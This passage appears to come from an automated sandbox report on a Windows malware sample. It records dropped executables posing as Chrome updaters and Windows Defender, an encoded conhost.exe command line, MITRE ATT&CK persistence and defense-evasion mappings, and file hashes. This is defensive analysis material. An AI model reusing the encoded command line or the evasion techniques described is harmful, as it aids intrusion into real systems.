      cmd: C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
      - Modifies data under HKEY_USERS

[1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 5088)
    cmd: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 872)
    cmd: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    - Executes dropped EXE

[1] C:\Program Files\Notepad\Chrome\updater.exe (PID 4124)
    cmd: "C:\Program Files\Notepad\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory

[1] C:\Program Files\Google\Chrome\updater.exe (PID 4936)
    cmd: "C:\Program Files\Google\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory

[1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 384)
    cmd: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    - Executes dropped EXE

[1] C:\Windows\windefender.exe (PID 764)
    cmd: C:\Windows\windefender.exe
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 4344)
    cmd: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 2128)
    cmd: C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Persistence
- Modify Existing Service 3
- Registry Run Keys / Startup Folder 1
- Scheduled Task 1
Defense Evasion
- Disabling Security Tools 2
- Impair Defenses 1
- Modify Registry 4
Web Service 1
Downloads
-
Filesize
1KB
MD555e503e7231b10483bce19b9be0a5a44
SHA12abf0246d76a1781db2336604fbb33c9ad622372
SHA256619a98de906f3640548bedb011e024840690e0bc7f1064ba301f495448c5a545
SHA5123f66641679fee5fdba055c7b43489299e2b51e4d120f7ac7e97ade64c3cf3c9809328e64ffb2a28223e4c585886596a02aea9abb891546edc051e77ebf7860a1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
SHA256f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
SHA256f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
SHA256f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
-
Filesize
293KB
MD5e858e636547aa1dff328554f5750cb37
SHA1a96483d7314414755ae9f89e389843ae35d3fece
SHA2567a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA5124f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30
-
Filesize
293KB
MD5e858e636547aa1dff328554f5750cb37
SHA1a96483d7314414755ae9f89e389843ae35d3fece
SHA2567a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA5124f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30
-
Filesize
293KB
MD5e858e636547aa1dff328554f5750cb37
SHA1a96483d7314414755ae9f89e389843ae35d3fece
SHA2567a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA5124f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30
-
Filesize
293KB
MD5e858e636547aa1dff328554f5750cb37
SHA1a96483d7314414755ae9f89e389843ae35d3fece
SHA2567a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA5124f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
321KB
MD591ec853e75e7e069149c97d2c126ffb6
SHA11aff8aa2940f85e8e87fa16b130c23feaede946d
SHA256aa26cfbb528cd91c2b29827df28911115e377de9bd2c3dfe2f554f905c1bb826
SHA51202539134dc96cee622f4c9551a3a2e8fbe4fd2f7f02eb0caa018cea3f6246624dacfe299dd0475f0c549314c597c2fb01ec1353ccb7cf51101fa9545fc4bdeb2
-
Filesize
321KB
MD591ec853e75e7e069149c97d2c126ffb6
SHA11aff8aa2940f85e8e87fa16b130c23feaede946d
SHA256aa26cfbb528cd91c2b29827df28911115e377de9bd2c3dfe2f554f905c1bb826
SHA51202539134dc96cee622f4c9551a3a2e8fbe4fd2f7f02eb0caa018cea3f6246624dacfe299dd0475f0c549314c597c2fb01ec1353ccb7cf51101fa9545fc4bdeb2
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
-